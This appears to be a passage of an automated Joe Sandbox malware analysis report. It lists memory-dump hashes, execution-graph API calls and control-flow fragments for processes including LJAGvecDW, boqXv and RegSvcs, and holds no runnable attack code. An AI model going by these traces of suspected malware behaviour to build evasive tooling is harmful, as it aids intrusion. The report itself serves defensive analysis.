                                                  • Instruction Fuzzy Hash: 6521DDB4C01218DFEB60CF9AC988BDEBFF4BB48714F24901AE409BB241C7B55845CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eb72f71b9eedbbae3088984363dcf8c3de63971cf9e1adf4cf6a4f5ced7f1b8d
                                                  • Instruction ID: ace40607afe44384aa35108dec30e7711b64722f84a01343c3ca46758bb4f771
                                                  • Opcode Fuzzy Hash: eb72f71b9eedbbae3088984363dcf8c3de63971cf9e1adf4cf6a4f5ced7f1b8d
                                                  • Instruction Fuzzy Hash: 6C2190B4A00A08DFC754DF5AE188999BFF1FF89310F5280D5D8489B365E776E991CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a38805672fe391afd96815747870129c10681dfca776454897d50ba4c34ba487
                                                  • Instruction ID: 761b3b2768d9a18bbe757e3191c449f73bc5d399c559867d981d9984f1b60d0c
                                                  • Opcode Fuzzy Hash: a38805672fe391afd96815747870129c10681dfca776454897d50ba4c34ba487
                                                  • Instruction Fuzzy Hash: 4C111C32F002198BCB54EBB998106EEB7B6AF89291B24406AC505E7344EB358D11CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443185534.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_87d000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                  • Instruction ID: f581b6f17666608e887f3ba2a8fd7d51f24045ed6395839eb161c12777b34d7f
                                                  • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                  • Instruction Fuzzy Hash: 5911AF76504280CFCB15CF10D5C4B16BF71FB94328F24C6A9D8494B65AC33AD856CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0880735f3d7730bef060d6f4a6d1fe24d8af373db09eee38f542a632e13e7e0
                                                  • Instruction ID: 0ad34773061ac591f8f9d33beba8163ac280d4127eeef5ec703247a91cffc168
                                                  • Opcode Fuzzy Hash: a0880735f3d7730bef060d6f4a6d1fe24d8af373db09eee38f542a632e13e7e0
                                                  • Instruction Fuzzy Hash: 1421D0B5900349DFDB60CF9AD884ADEBBF4FB48320F10841AE919A7311C375A954CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443264185.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_88d000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                  • Instruction ID: 37ac3c49312cd80355170ce80ae18c26df23436e2f2e00be7c1d251bc724ad01
                                                  • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                  • Instruction Fuzzy Hash: 02118B75504384DFCB15DF14D6C4B15BBA2FB84314F24C6A9D8498B6A6C33AE84ACB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443264185.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_88d000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                  • Instruction ID: 0a6accbe13e996f5790325fb727a78ed91788e841d46eb23e77d665ddeaf8bae
                                                  • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                  • Instruction Fuzzy Hash: 5A11BB75504784CFCB11DF10D5C4B15BBA2FB84314F24C6AAD8498B696C33AD80ACBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f7ce081c4e11e9987964e9bfb9dbf741ffdd3285a8915397e11efb0fb40343e3
                                                  • Instruction ID: 30cf5c533aedf9d6883be5a7de8d2e9d8df47522ed893197430989d3b2517d43
                                                  • Opcode Fuzzy Hash: f7ce081c4e11e9987964e9bfb9dbf741ffdd3285a8915397e11efb0fb40343e3
                                                  • Instruction Fuzzy Hash: 12F03C78D09248DFDB44DFA9D5406EEBBB8FB4A300F00A1AAD419A3349D770DA00CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1e0cb547cadb38cfa218bfff4a98d9c51f6b803b6711a328b10ba3176134fbe
                                                  • Instruction ID: d42f7599e09d38570e435bb453e7aa451bc87055e0741f0829bacbe3530089fb
                                                  • Opcode Fuzzy Hash: e1e0cb547cadb38cfa218bfff4a98d9c51f6b803b6711a328b10ba3176134fbe
                                                  • Instruction Fuzzy Hash: 7001A2B4D002599FCB50DFA8D5956AEBBF4FB08300F2486AAD954E3344D7349A81CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 84a8d1d9bd5300772579a79495623fb10943087094459fa1edce4209935c9ce8
                                                  • Instruction ID: f13394500ec72bda217e7c029d5812009e49972f56242fa1ce0b1f052a81ef54
                                                  • Opcode Fuzzy Hash: 84a8d1d9bd5300772579a79495623fb10943087094459fa1edce4209935c9ce8
                                                  • Instruction Fuzzy Hash: 9501AF74A00208EFCB44DFA9C598A9DBBF1EF48210F09C0A9E9089B365D635EA41CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4005a9d07acffe0fd2da9293fe109ba0a3cc40cdce437b8787cb172955a0510f
                                                  • Instruction ID: 48502f2c3681bf8f2bdda9adf9496b0c801130b05bab18af125f2e37e39d5bf0
                                                  • Opcode Fuzzy Hash: 4005a9d07acffe0fd2da9293fe109ba0a3cc40cdce437b8787cb172955a0510f
                                                  • Instruction Fuzzy Hash: 02F0C275904248EFCB44DF98D940AADBBB9FB48310F14C1A9EC1957350D632DA61EF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fac2e00bda4eceedfe92e308939308366b26a9bf15d79d6dd54b372682509cad
                                                  • Instruction ID: 6cffda58f8bf76ade62365815a3aeec89e1ffad77c3f850a30787816b2a9d295
                                                  • Opcode Fuzzy Hash: fac2e00bda4eceedfe92e308939308366b26a9bf15d79d6dd54b372682509cad
                                                  • Instruction Fuzzy Hash: 23C012714042489BC350DBB5D91875976A9D709111F404154D809C3240DAB69980D6A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6b731a8e437ccc1eb9bcb6583694581d2b7dfb1824d104b64041dd04ab5c45b
                                                  • Instruction ID: 060d757ae71ca3761ea7bea04d2f6c6cd95ad428ae77aa723d568da4dfee8403
                                                  • Opcode Fuzzy Hash: f6b731a8e437ccc1eb9bcb6583694581d2b7dfb1824d104b64041dd04ab5c45b
                                                  • Instruction Fuzzy Hash: 39B012661B4200EAB6886F744C40CAFFA51FBBA700B00BC45B35611058CCA0C424D63F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.2405168626.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_1910000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed3abc94243cc6af5d7843e7eaae5f3585546b90a06f365c0780a3298c8a582f
                                                  • Instruction ID: 3335c5bf9881f67a0c958a85fde37dac517d4dfa5d2114266a7ffab6fdf0fe40
                                                  • Opcode Fuzzy Hash: ed3abc94243cc6af5d7843e7eaae5f3585546b90a06f365c0780a3298c8a582f
                                                  • Instruction Fuzzy Hash: 99222C30700606DBD724DF34D99063A77AAFB88351F50897DDA1A87399DB36EC81CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.2405168626.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_1910000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21c90990b117a9182eb610b4d5c9496ad4e01414f5ba870d429d495e399e6af7
                                                  • Instruction ID: 4fe7888452bee3bddd6007f32c9fd31de528be7e79431ec46d63c4edab1544ab
                                                  • Opcode Fuzzy Hash: 21c90990b117a9182eb610b4d5c9496ad4e01414f5ba870d429d495e399e6af7
                                                  • Instruction Fuzzy Hash: 4A81A035A00305DFEB259B74C4186AEBBB6EF88310F18856DE50A67268DF76ACC5CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.2405168626.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_1910000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c7634a7a48d0acf8d93767a0dcea95316c5bfd0f17502aba11c9cf7d3c681a7
                                                  • Instruction ID: 8313509dbad2d428f741b467aff7348787bb8aa62d6b854b99dba97f6da2970a
                                                  • Opcode Fuzzy Hash: 1c7634a7a48d0acf8d93767a0dcea95316c5bfd0f17502aba11c9cf7d3c681a7
                                                  • Instruction Fuzzy Hash: C731F635701211CFC759AB38C45881D7BE6AF8A71636118B8E606CF3B6DA76DC82CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.2405168626.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_1910000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 819ca2b961e4cac53526aec18324d8780a00142dbaf3b505c8b9a9428e556aa3
                                                  • Instruction ID: 33ca28938bbc7a82ac9955be7a8f3e8abee53c9caa5090122b0652de8ca0d4be
                                                  • Opcode Fuzzy Hash: 819ca2b961e4cac53526aec18324d8780a00142dbaf3b505c8b9a9428e556aa3
                                                  • Instruction Fuzzy Hash: 7021E935701211CFC759AB79C45881D7BE6AF8A71636118B8EA06CF3B5DE76DC82CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.2405168626.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_1910000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dbf6a975ce037544bfd6e0dd91166d2031b6ec3424c82d6800ad8431a024e0d8
                                                  • Instruction ID: 7407cbce79831a2876ffc422bd7e3d8a1a0b44be10a05861aceff354e8e20d50
                                                  • Opcode Fuzzy Hash: dbf6a975ce037544bfd6e0dd91166d2031b6ec3424c82d6800ad8431a024e0d8
                                                  • Instruction Fuzzy Hash: 6511D335B00209AFC714EFB8E4506AD77BAFF88300F1044A9DA09AB394DF759D06CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.2405168626.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_1910000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b67ddfb7c331bb2d500707023645f4ddb5200bef4b20631ff722fd6a5bea8e7a
                                                  • Instruction ID: 9894b3475e743fba72b8b8fccceca0819df4f10b437367f11cda549ba3dbffc9
                                                  • Opcode Fuzzy Hash: b67ddfb7c331bb2d500707023645f4ddb5200bef4b20631ff722fd6a5bea8e7a
                                                  • Instruction Fuzzy Hash: 31117076E002059FCB14DFB4D9809AFBBF5FF8D30071181AAE61597221E735A945CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.2405168626.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_1910000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12e51fb09723d0c2354742f31c9f4847f7c5c40fe12a2153c68e52accd952b49
                                                  • Instruction ID: 90f1f71930e0d3d7beed80163515a4f30b54ed181b27fdb230944ff465df3120
                                                  • Opcode Fuzzy Hash: 12e51fb09723d0c2354742f31c9f4847f7c5c40fe12a2153c68e52accd952b49
                                                  • Instruction Fuzzy Hash: 9F019236E0020A9FCB10DFB4D9408AFFBF5FF8C310710816AE61997220E735A901CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.2405168626.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_1910000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cc578a8e944535df7537d2d06e37ce3ec1a0a94cd25f8c032f697b6ef159ac52
                                                  • Instruction ID: b8aef91fa4b749d55ced852cf6b98d9f8e78bb6099f707892461c67a124be3f9
                                                  • Opcode Fuzzy Hash: cc578a8e944535df7537d2d06e37ce3ec1a0a94cd25f8c032f697b6ef159ac52
                                                  • Instruction Fuzzy Hash: 83F06D71D0E3899FCB12DBB8DC4118E7FF4AE46200B0904E6D889D7222E2356924CBE3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.2405168626.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_1910000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb02501390c17bf235a947170b313ae44c0c3a6c349f39e704ecb750fac661ce
                                                  • Instruction ID: f29dd914b373eec5dff2b84321cde20d4eb248f71a1ad8cd5a7ab6962fbff5ce
                                                  • Opcode Fuzzy Hash: bb02501390c17bf235a947170b313ae44c0c3a6c349f39e704ecb750fac661ce
                                                  • Instruction Fuzzy Hash: CAF01C74904309DFDB24DB74C45979DBBB0BB48715F240868D506AB264CBB598C4CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.2405168626.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_1910000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 636536d1e666d86127237155e763069101a8effb942ac40b93ab5f7a7567cb5e
                                                  • Instruction ID: 7ba7809664cd0e53c8b1596180a8e82b15a15e73abacb3d3d6015cbf3a2e1fad
                                                  • Opcode Fuzzy Hash: 636536d1e666d86127237155e763069101a8effb942ac40b93ab5f7a7567cb5e
                                                  • Instruction Fuzzy Hash: 37D017B1D0521DAF8B40EFB899051DEBBF8EE08250B0045A6D90AE3204E2714A108BD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:10.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:150
                                                  Total number of Limit Nodes:15
                                                  execution_graph 39185 63a2bf8 DuplicateHandle 39186 63a2c8e 39185->39186 39264 51e0848 39266 51e084e 39264->39266 39265 51e091b 39266->39265 39270 63a18a8 39266->39270 39274 63a1898 39266->39274 39278 51e1390 39266->39278 39271 63a18b7 39270->39271 39282 63a0f84 39271->39282 39275 63a18b7 39274->39275 39276 63a0f84 3 API calls 39275->39276 39277 63a18d8 39276->39277 39277->39266 39280 51e13a6 39278->39280 39279 51e14b8 39279->39266 39280->39279 39358 51e7528 39280->39358 39283 63a0f8f 39282->39283 39286 63a2764 39283->39286 39285 63a325e 39285->39285 39287 63a276f 39286->39287 39288 63a3984 39287->39288 39290 63a5608 39287->39290 39288->39285 39292 63a5629 39290->39292 39291 63a564d 39291->39288 39292->39291 39294 63a57b8 39292->39294 39296 63a57c5 39294->39296 39295 63a57fe 39295->39291 39296->39295 39298 63a3748 39296->39298 39299 63a3753 39298->39299 39301 63a5870 39299->39301 39302 63a49f4 39299->39302 39301->39301 39303 63a49ff 39302->39303 39309 63a4a04 39303->39309 39305 63a58df 39313 63aac00 39305->39313 39322 63aabe8 39305->39322 39306 63a5919 39306->39301 39312 63a4a0f 39309->39312 39310 63a6b68 39310->39305 39311 63a5608 3 API calls 39311->39310 39312->39310 39312->39311 39315 63aac31 39313->39315 39316 63aad31 39313->39316 39314 63aac3d 39314->39306 39315->39314 39330 63aae78 39315->39330 39333 63aae77 39315->39333 39316->39306 39317 63aac7d 39337 63ac178 39317->39337 39341 63ac169 39317->39341 39324 63aac00 39322->39324 39323 63aac3d 39323->39306 39324->39323 39328 63aae78 2 API calls 39324->39328 39329 63aae77 2 API calls 39324->39329 39325 63aac7d 39326 63ac178 CreateWindowExW 39325->39326 39327 63ac169 CreateWindowExW 39325->39327 39326->39323 39327->39323 39328->39325 39329->39325 39345 63aaeb8 39330->39345 39331 63aae82 39331->39317 39334 63aae78 39333->39334 39336 63aaeb8 2 API calls 39334->39336 39335 63aae82 39335->39317 39336->39335 39338 63ac1a3 39337->39338 39339 63ac252 39338->39339 39353 63ad065 39338->39353 39342 63ac178 39341->39342 39343 63ac252 39342->39343 39344 63ad065 CreateWindowExW 39342->39344 39344->39343 39346 63aaebd 39345->39346 39347 63aaefc 39346->39347 39351 63ab15d LoadLibraryExW 39346->39351 39352 63ab160 LoadLibraryExW 39346->39352 39347->39331 39348 63aaef4 39348->39347 39349 63ab100 GetModuleHandleW 39348->39349 39350 63ab12d 39349->39350 39350->39331 39351->39348 39352->39348 39354 63ad069 39353->39354 39355 63ad09d CreateWindowExW 39353->39355 39354->39339 39357 63ad1d4 39355->39357 39359 51e7532 39358->39359 39360 51e754c 39359->39360 39363 63bd80f 39359->39363 39367 63bd820 39359->39367 39360->39280 39365 63bd835 39363->39365 39364 63bda4a 39364->39360 39365->39364 39366 63bda60 GlobalMemoryStatusEx 39365->39366 39366->39365 39368 63bd835 39367->39368 39369 63bda4a 39368->39369 39370 63bda60 GlobalMemoryStatusEx 39368->39370 39369->39360 39370->39368 39187 63a29b0 39188 63a29f6 GetCurrentProcess 39187->39188 39190 63a2a48 GetCurrentThread 39188->39190 39191 63a2a41 39188->39191 39192 63a2a7e 39190->39192 39193 63a2a85 GetCurrentProcess 39190->39193 39191->39190 39192->39193 39196 63a2abb 39193->39196 39194 63a2ae3 GetCurrentThreadId 39195 63a2b14 39194->39195 39196->39194 39197 51e7350 39198 51e7396 DeleteFileW 39197->39198 39200 51e73cf 39198->39200 39201 f3d01c 39202 f3d034 39201->39202 39203 f3d08e 39202->39203 39208 63ad268 39202->39208 39212 63ad257 39202->39212 39216 63aa04c 39202->39216 39225 63ae3b8 39202->39225 39209 63ad28e 39208->39209 39210 63aa04c CallWindowProcW 39209->39210 39211 63ad2af 39210->39211 39211->39203 39213 63ad265 39212->39213 39214 63aa04c CallWindowProcW 39213->39214 39215 63ad2af 39214->39215 39215->39203 39217 63aa057 39216->39217 39218 63ae429 39217->39218 39220 63ae419 39217->39220 39221 63ae427 39218->39221 39250 63ae01c 39218->39250 39234 63ae61c 39220->39234 39240 63ae540 39220->39240 39245 63ae550 39220->39245 39226 63ae3c8 39225->39226 39227 63ae429 39226->39227 39229 63ae419 39226->39229 39228 63ae01c CallWindowProcW 39227->39228 39230 63ae427 39227->39230 39228->39230 39231 63ae61c CallWindowProcW 39229->39231 39232 63ae550 CallWindowProcW 39229->39232 39233 63ae540 CallWindowProcW 39229->39233 39231->39230 39232->39230 39233->39230 39235 63ae5da 39234->39235 39236 63ae62a 39234->39236 39254 63ae608 39235->39254 39257 63ae5f8 39235->39257 39237 63ae5f0 39237->39221 39242 63ae54e 39240->39242 39241 63ae5f0 39241->39221 39243 63ae608 CallWindowProcW 39242->39243 39244 63ae5f8 CallWindowProcW 39242->39244 39243->39241 39244->39241 39246 63ae564 39245->39246 39248 63ae608 CallWindowProcW 39246->39248 39249 63ae5f8 CallWindowProcW 39246->39249 39247 63ae5f0 39247->39221 39248->39247 39249->39247 39251 63ae027 39250->39251 39252 63af88a CallWindowProcW 39251->39252 39253 63af839 39251->39253 39252->39253 39253->39221 39255 63ae619 39254->39255 39261 63af7c0 39254->39261 39255->39237 39258 63ae608 39257->39258 39259 63ae619 39258->39259 39260 63af7c0 CallWindowProcW 39258->39260 39259->39237 39260->39259 39262 63ae01c CallWindowProcW 39261->39262 39263 63af7da 39262->39263 39263->39255

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 063A2A2E
                                                  • GetCurrentThread.KERNEL32 ref: 063A2A6B
                                                  • GetCurrentProcess.KERNEL32 ref: 063A2AA8
                                                  • GetCurrentThreadId.KERNEL32 ref: 063A2B01
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506740526.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63a0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 56a70f82827ce18a36913d90e7f44422a604540e13b9ccc709a5e7026681af70
                                                  • Instruction ID: 79045f8fa6776470422a74e33ae0992e2b497092caee053587f2f343e8c34833
                                                  • Opcode Fuzzy Hash: 56a70f82827ce18a36913d90e7f44422a604540e13b9ccc709a5e7026681af70
                                                  • Instruction Fuzzy Hash: 535175B0D003498FDB54DFAAD948BEEBBF1FF88314F248019E409A7290DB745944CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 063A2A2E
                                                  • GetCurrentThread.KERNEL32 ref: 063A2A6B
                                                  • GetCurrentProcess.KERNEL32 ref: 063A2AA8
                                                  • GetCurrentThreadId.KERNEL32 ref: 063A2B01
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506740526.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63a0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 320c84637c324d019c78013bd4bddd0158dda69edc76712e5c1ee4beb10971cc
                                                  • Instruction ID: 0ae70e4a0cc4974018d914e1d6a55736271a11e9fcfd38a3d5d0fd786a9a552a
                                                  • Opcode Fuzzy Hash: 320c84637c324d019c78013bd4bddd0158dda69edc76712e5c1ee4beb10971cc
                                                  • Instruction Fuzzy Hash: CA5175B09003498FDB54DFAAD948BEEBBF1FF88314F248019E409A7290DB745944CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 955 63aaeb8-63aaed7 957 63aaed9-63aaee6 call 63a9e68 955->957 958 63aaf03-63aaf07 955->958 963 63aaee8 957->963 964 63aaefc 957->964 960 63aaf1b-63aaf5c 958->960 961 63aaf09-63aaf13 958->961 967 63aaf69-63aaf77 960->967 968 63aaf5e-63aaf66 960->968 961->960 1012 63aaeee call 63ab15d 963->1012 1013 63aaeee call 63ab160 963->1013 964->958 969 63aaf9b-63aaf9d 967->969 970 63aaf79-63aaf7e 967->970 968->967 975 63aafa0-63aafa7 969->975 972 63aaf89 970->972 973 63aaf80-63aaf87 call 63a9e74 970->973 971 63aaef4-63aaef6 971->964 974 63ab038-63ab0f8 971->974 977 63aaf8b-63aaf99 972->977 973->977 1007 63ab0fa-63ab0fd 974->1007 1008 63ab100-63ab12b GetModuleHandleW 974->1008 978 63aafa9-63aafb1 975->978 979 63aafb4-63aafbb 975->979 977->975 978->979 981 63aafc8-63aafd1 call 63a34cc 979->981 982 63aafbd-63aafc5 979->982 987 63aafde-63aafe3 981->987 988 63aafd3-63aafdb 981->988 982->981 989 63ab001-63ab00e 987->989 990 63aafe5-63aafec 987->990 988->987 997 63ab010-63ab02e 989->997 998 63ab031-63ab037 989->998 990->989 992 63aafee-63aaffe call 63a8688 call 63a9e84 990->992 992->989 997->998 1007->1008 1009 63ab12d-63ab133 1008->1009 1010 63ab134-63ab148 1008->1010 1009->1010 1012->971 1013->971
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 063AB11E
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506740526.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63a0000_RegSvcs.jbxd
